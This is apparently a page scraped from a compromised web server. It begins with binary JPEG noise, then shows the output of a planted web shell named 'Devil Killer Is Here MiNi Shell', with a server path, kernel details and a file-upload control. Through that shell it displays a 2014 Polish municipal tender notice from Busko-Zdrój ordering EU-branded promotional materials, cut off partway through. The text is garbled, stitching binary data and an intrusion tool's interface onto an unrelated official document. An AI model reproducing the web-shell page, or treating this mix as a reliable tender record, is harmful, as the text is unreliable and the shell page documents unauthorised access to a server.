JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20140929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20140929/321012-N-2014.html

<p class="kh_header"><b>Busko-Zdrój: Zaprojektowanie, wykonanie i dostarczenie materiałów promocyjnych dla zadania pn.*Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II*
realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 321012 - 2014; data zamieszczenia: 29.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie, wykonanie i dostarczenie materiałów promocyjnych dla zadania pn.*Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II*
realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest:
Usługa polegająca na zaprojektowaniu, wykonaniu i dostarczeniu materiałów promocyjnych dla zadania pn. *Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II * realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013, 
a w tym:  

1) długopis metalowy:
- automatyczny o metalizowanej chromowanej powierzchni, 
- kolor obudowy: miks kolorystyczny (czerwony, błękitny, zielony),
- z niebieskim wkładem wymiennym, 
- opakowanie: po 100sztuk , całość w opakowaniu tekturowym zbiorczym
- oznakowany dwustronnie techniką graweru laserowego (na powierzchni długopisu): 
a) logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego
b) logo Program Regionalny
c) herb Województwa Świętokrzyskiego z podpisem *Województwo Świętokrzyskie*,
d) herb Gminy Busko-Zdrój z podpisem *Gmina Busko-Zdrój*,
e) hasło RPOWŚ *...dla rozwoju Województwa Świętokrzyskiego...*
f) napis: Projekt pn. *Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II* 

2) ołówek automatyczny metalowy:
- automatyczny o metalizowanej chromowanej powierzchni, 
- kolor obudowy: miks kolorystyczny (czerwony, błękitny, zielony),
- opakowanie: po 100sztuk , całość w opakowaniu tekturowym zbiorczym
- oznakowany dwustronnie techniką graweru laserowego (na powierzchni ołówka): 
a) logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego
b) logo Program Regionalny
c) herb Województwa Świętokrzyskiego z podpisem *Województwo Świętokrzyskie*,
d) herb Gminy Busko-Zdrój z podpisem *Gmina Busko-Zdrój*,
e) hasło RPOWŚ *...dla rozwoju Województwa Świętokrzyskiego...*
f) napis: Projekt pn. * Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II*

3) kalendarz książkowy dzienny: 
- Kalendarze: na 2015 rok
- Wymiary około 17cm(szerokość)x24cm(wysokość) (?2cm) 
- Układ: 1 dzień na 1 stronie, sobota i niedziela na 1 stronie, przed każdym miesiącem terminarz miesięczny
- Objętość: min 368 stron
- Papier: chamois 80g/m2, wyklejki papier 140g/m2
- Druk: szaro-bordowy lub szaro-niebieski
- Kalendarium 5 języczne: PL, GB, D, RUS, FR, imieniny i święta, fazy księżyca, wschody i zachody słońca, na dole kalendarium plan całego roku
- Mapy: z tyłu mapa Europy, mapa Polski, 8 stron z mapami głównych miast w Polsce: Gdańsk, Katowice, Kraków, Łódź, Poznań, Szczecin, Warszawa, Wrocław oraz Kielce i Busko-Zdrój 
- Część informacyjna: dane teleadresowe, międzymiastowe, telefony alarmowe, imieniny, numeracja dni i tygodni, wschody, zachody słońca, fazy księżyca, znaki zodiaku, plan roczny 2014, 2015, 2016, plan urlopowy, jednostki miar, odległości między miastami, Informacje o Państwach Członkowskich UE, zestawienie świąt, przedstawicielstwa Polski w krajach UE, adresy internetowe, tel. numery kierunkowe, kalendarz stuletni, strefy czasowe, plan miesięczny na rok 2015, skorowidz od A do Z
- Część promocyjna na wyklejance z przodu: 
a) należy umieścić zdjęcia kolorowe z obiektów dot. projektu - zdjęcia należy wykonać we własnym zakresie i propozycje wcześniej uzgodnić z Zamawiającym
b) należy również umieścić: 
- logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego
- logo Program Regionalny
- herb Województwa Świętokrzyskiego z podpisem *Województwo Świętokrzyskie*,
- herb Gminy Busko-Zdrój z podpisem *Gmina Busko-Zdrój*,
- hasło RPOWŚ *...dla rozwoju Województwa Świętokrzyskiego...*
- napis: Projekt pn. * Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II* 
- Wykończenie: Blok kalendarza szyty oraz dodatkowo klejony, wzmocniony krepą, tasiemka z logo Unii Europejskiej, herb Województwa Świętokrzyskiego, hasło RPOWŚ i nazwa projektu (według wytycznych jak powyżej) oraz kapitałka w kolorze kremowym, oprawa skóropodobna,
4) kalendarz notesowy z gumką tygodniowy: 
- Kalendarze: na 2015 rok
- Wymiary około 8cm(szerokość)x18cm(wysokość) (?2cm) 
- Układ tygodniowy, 1 tydzień na 2 stronach (cały tydzień na rozkładówce), przed każdym miesiącem terminarz miesięczny
- Papier: chamois 80g/m2, wyklejki papier 140g/m2
- Druk: szaro-bordowy lub szaro-niebieski
- Kalendarium 5 języczne: PL, GB, D, RUS, FR, imieniny i święta, fazy księżyca, wschody i zachody słońca, na dole kalendarium plan całego roku
- Część informacyjna: dane teleadresowe, międzymiastowe, telefony alarmowe, imieniny, numeracja dni i tygodni, wschody, zachody słońca, fazy księżyca, znaki zodiaku, plan roczny 2014, 2015, 2016, plan urlopowy, jednostki miar, odległości między miastami, Informacje o Państwach Członkowskich UE, zestawienie świąt, przedstawicielstwa Polski w krajach UE, adresy internetowe, tel. numery kierunkowe, kalendarz stuletni, strefy czasowe, plan miesięczny na rok 2015, skorowidz od A do Z
- Część promocyjna na wyklejance z przodu: 
a) należy umieścić zdjęcia kolorowe z obiektów dot. projektu - zdjęcia należy wykonać we własnym zakresie i propozycje wcześniej uzgodnić z Zamawiającym
b) należy również umieścić: 
- logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego
- logo Program Regionalny
- herb Województwa Świętokrzyskiego z podpisem *Województwo Świętokrzyskie*,
- herb Gminy Busko-Zdrój z podpisem *Gmina Busko-Zdrój*,
- hasło RPOWŚ *...dla rozwoju Województwa Świętokrzyskiego...*
- napis: Projekt pn. * Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II* 
- Wykończenie: Blok kalendarza szyty oraz dodatkowo klejony, wzmocniony krepą, tasiemka z logo Unii Europejskiej, herb Województwa Świętokrzyskiego, hasło RPOWŚ i nazwa projektu (według wytycznych jak powyżej) oraz kapitałka w kolorze kremowym, oprawa skóropodobna,
5) breloczki z otwieraczami:
- metalowy, 
- minimalne wymiary 8,3x2,8 cm
- pakowany w pojedynczy kartonik, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
6) teczki konferencyjne A4 zapinane:
- teczka konferencyjna wykonana z miękkiej skóry PU (przypominająca prawdziwą skórę). Zawierająca notes formatu A4 -30 stron , uchwyt na długopis trzy przegródki
- powierzchnia nadruku 7x2,5 cm. 
- minimalne wymiary 24,5 x 33 x1,3 cm 
-  należy przedstawić 4  propozycje do zaakceptowania przez Zamawiającego,
7) teczki z gumką:
- Wykonana z grubej tektury, powlekana  folią polipropylenową z czarną wyklejką w środku.
Wyposażona w gumkę wzdłuż długiego boku, Posiada trzy wewnętrzne klapki zabezpieczające dokumenty, przed wypadnięciem.;
- minimalne wymiary: 230mm x 310mm x 20mm.
- różne kolory 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
8) torby konferencyjne:
- torba wykonana jest z poliestru, torba z regulowanym paskiem na ramię i rączki, zapinana na suwak błyskawiczny 
- minimalne wymiary: 42.7 x 30 x 10cm.
- powierzchnia nadruku 7x2,5 cm.
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
9) torby na ramię:
- poliestrowa torba na ramię z regulowanym paskiem na ramię i rączką. Torba posiadać ma kieszeń główną zasuwaną na zamek błyskawiczny oraz mniejszą kieszeń z przodu torby również na zamek błyskawiczny, przegródki na długopisy,
- pakowane w pojedyncze torebki,
- minimalne wymiary 19x6,5x22 cm 
- powierzchnia nadruku 10x3 cm. 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
10) torby na zakupy:
- przestronna i wytrzymała  poliestrowa  torba na zakupy z dwoma komorami 
- minimalne wymiary : 43,0 x 40,0 x 20,0 cm.
- powierzchnia nadruku 10x3 cm
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
11) torby termiczne:
- dwupoziomowa torba-lodówka, 
- dolna komora powinna posiadać tyle miejsca, aby pomieścić 6 puszek 0,33l;
- minimalne wymiary 25cm x 22cm x 17cm;
- wyposażona w dwa uchwyty i regulowany pasek do przewieszenia przez ramię,
- logotyp umieszczony na torbie, o wymiarach 10 x 3 cm
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
12) torby sportowe:
-torba sportowa podróżna - kieszeń główna na zamek błyskawiczny, regulowany
            pasek na ramię z miękką poduszeczką na ramię. Torba powinna posiadać dodatkowe rączki/ uchwyty. Torba powinna być wykonana z poliestru, nieprzemakalna i powinna posiadać   boczne 2 kieszonki
- minimalne wymiary 50x20x31xcm 
- Powierzchnia nadruku 10 x3 zm. 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
13) notatniki A4:
- 60- kartkowy, 
- gramatura papieru: 90g/m2,
- kolor papieru: biały,
- minimalne wymiary 21,5x 28,8x0,6 cm 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
14) notatniki A5:
- 160- kartkowy  w linię 
- gramatura papieru: 90g/m2,
- kolor papieru: biały,
- twarda okładka, różnych kolorów,
- minimalne wymiary 15x 21x2,0 cm;
- okładka z materiału skóropodobnego, tasiemka-zakładka kolorowa, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
15) notatniki B5:
- 60 kartkowy, zamykany na gumkę,
- gramatura papieru: 90g/m2,
- kolor papieru: biały,
- twarda okładka, różnych kolorów,
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
16) wizytownik stojący:
- metalowy, obrotowy,
- pakowany w pojedynczy kartonik, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
17) podstawki pod telefon komórkowy:
- plastikowa podstawka  z metalowymi podpórkami, 
- pakowana w pojedynczy kartonik, 
- minimalne wymiary 7,5-8,0 x 7,0x 8,0 cm
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
18)	pamięć USB w etui:
- materiał: metal, 
- pojemność: 32GB.
- prędkość odczytu zapisu: minimum 20MB
- pakowane w pojedyncze kartoniki, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
19) koszulki bawełniane:
- gramatura - 205 g/m2 (White: 190g/m2) 
- MATERIAŁ : 100% bawełny
- 60% damskie (rozmiary: S, M, L,XL ) kolory: czarny, czerwony, niebieski,biały, szary
- 40% męskie (rozmiary: M, L, XL, XXL ) kolory: czarny, szary, granatowy, biały,
- projekt koszulki  należy wcześniej uzgodnić z Zamawiającym 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
20) parasolki:
- kolory: biały, kremowy, cappuccino, błękit, ciemna zieleń (butelkowa), jasna zieleń, czerwony, jednobarwne, 
- składane parasolki tzw. torebkowe -automat ,
- wymiary minimalne po rozłożeniu: *fi* 90cm;
- wymiary maksymalne po złożeniu: 27cm (długość); 
- materiał: wodoodporny, wysokiej jakości nylon, uchwyt metalowy , stelaż z włóknem szklanym,
- waga minimalna: 300g
- projekt nadruków należy wcześniej uzgodnić z Zamawiającym 
- powierzchnia nadruku: 10x3 cm
- pakowany pojedynczo w pokrowiec ochronny z materiału z którego wykonany jest parasol
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
21) kurtki przeciwdeszczowe:
- 60% damskie (rozmiary: S, M, L,XL ) kolory: czarny, czerwony, granatowy,
- 40% męskie (rozmiary: M, L, XL, XXL ) kolory: czarny, szary, granatowy
- materiał: wodoodporny, 100% poliester,
- gramatura: 110g/m2
- wysokie parametry oddychalności
- niska waga
- zapinana na całej długości
- podszewka z przewiewnej siateczki
- wytrzymałe zamki
- kaptur z tylną regulacją
- wysoki kołnierz dla dodatkowej ochrony przed zimnym wiatrem
- elastyczna gumka w mankietach
- boczne kieszenie
- kurtka powinna być zapakowana  w estetyczną  torebkę.
- projekt kurtki należy wcześniej uzgodnić z Zamawiającym 
- powierzchnia nadruku 10x3 cm
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
22) nożyczki:
- nożyczki biurowe gumowany uchwyt - ostrza  ze stali nierzewnej o ergonomicznym kształcie,
- minimalne wymiary: 18 cm,
- pakowane  pojedynczo, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
23) kubki:
- porcelanowy o grubości ścianki maksymalnie 1,0mm;
- o pojemności około 0,3l,  
- pakowane w pojedyncze kartoniki, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
24)  kubki termiczne:
- pojemność min: 0,4l,
- z podgrzewaczem,
- z możliwością podłączenia do zapalniczki w aucie, 
- logotyp w postaci graweru laserowego,
- pakowany w pojedynczy kartonik, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
25)  etui na CD:
- etui na płyty CD wykonane ze skóry ekologicznej, podwójnym szwem z mocnej, jasnej nici. W środku futerał pokryty jest mikrofibrą. Kształt kwadrat. Zapinany na suwak błyskawiczny.
- Kolor: brąz, czarny, granat.
- minimalne wymiary: 16 x 15 x 3,5 cm,
- etui powinno pomieścić minimum 20 płyt
- pakowany w pojedynczy kartonik, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
26) taśmy miernicze stalowe:
- 8-metrowa miarka,
- funkcja stop,
- mechanizm zwijania
- rozmiary minimalne: 8cm x cm8 x 3,5cm,
 - materiał taśmy: metal,
- pakowane w pojedyncze kartoniki, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
27) drogomierz:
- materiał:  aluminium;
- obwód koła około 1 m;
- minimalna podziałka: 1 cm;
- maksymalny rejestrowany pomiar: 9999,99 m;
- w komplecie: pokrowiec, baterie,
- wyniki pomiaru wyświetlane w postaci cyfrowej na podświetlanym ekranie;
- funkcja Hold do łatwego odczytywania wartości pomiaru drogomierzem;
- pamięc na pięć zmierzonych wartości;
- odejmowanie wyniku przy ruchu wstecz i dodawanie w przód;
- solidne koło pomiarowe z okładziną antypoślizgową i pięcioma szprychami
- wygodny uchwyt do prowadzenia pomiarów z funkcją składania do łatwego przechowywania i transportowania
- hamulec do blokowania koła i odczytu
- boczna podpórka do odstawiania nieużywanego koła pomiarowego;
- miękki pokrowiec transportowy  
28)	dalekomierz elektroniczny:
- zintegrowana kamera z 4-krotnym powiększeniem umożliwiającym pomiary nawet w słoneczne dni,
- odporność na pył i polewanie strumieniem wody, zgodnie z normą IP65,
- 200 metrowy zasięg dzięki technologii Power Range Technology oraz trybowi LongRange;
- czujnik pochylenia 360o do pomiarów nachyleń i wysokości;
- funkcja redukcji Smart Horizontal Mode;
- wysokościowe pomiary śledzące do pomiarów wysokości drzew, kabli itp.;
- bluetooth Smart do transmisji danych wprost do iPhona lub iPada;
- wyrazisty i czytelny ekran;
- mnogość funkcji pomiarowych i obliczeniowych prostych w obsłudze;
- wbudowany kalkulator;
- podświetlany 3-liniowy ekran;
- automatyczna i wielofunkcyjna stopka;
- wyposażenie: pokrowiec, pasek na rękę, baterie, instrukcja obsługi, skrócona instrukcja obsługi, karta gwarancyjna, certyfikat;
29) skarbonki:
- rozmiary minimalne: 10cm x 10cm x 10cm,
- materiał: plastik, 
- pakowany w pojedynczy kartonik, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
30) kredki:
- drewniane, ołówkowe, 12 kolorów, o przekroju zaokrąglonego trójkąta o średnicy wkładu 3 mm
- posiadające mocne i niełamliwe grafity, odporne na wodę i blaknięcie,
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
31) reklamówki:
- minimalne wymiary 30cm x 45cm x7,0 cm;
- materiał: folia LDPE, (polietylenowa torba reklamowa bez zakładki górnej z wyciętym uchwytem i podklejką DKT oraz zakładką spodnią).
- powierzchnia nadruku 20x7 cm

Na wszystkich powyższych artykułach należy umieścić: 
- logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego
- logo Program Regionalny
- herb Województwa Świętokrzyskiego z podpisem *Województwo Świętokrzyskie*,
- herb Gminy Busko-Zdrój z podpisem *Gmina Busko-Zdrój*,
- hasło RPOWŚ *...dla rozwoju Województwa Świętokrzyskiego...*
- napis: Projekt pn. *Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II* 

Materiały należy opracować zgodnie z wytycznymi Programu umieszczonymi na stronie internetowej  http://www.rpo-swietokrzyskie.pl  *Obowiązki Beneficjentów w zakresie działań informacyjnych i promocyjnych*

Wyceny należy dokonać w oparciu o załącznik nr 7 - uwzględniający ilość poszczególnych materiałów. 
W cenie zamówienia należy uwzględnić koszty dostarczenia zapakowanych materiałów do siedziby Zamawiającego.
    
II. Szczegółowy zakres prac określają:

1) WZÓR UMOWY - załącznik nr 6 do SIWZ;
2) Zestawienie ilości materiałów promocyjnych - załącznik nr 7 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 głównych usług polegających na zaprojektowaniu i wykonaniu materiałów promocyjnych 
wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

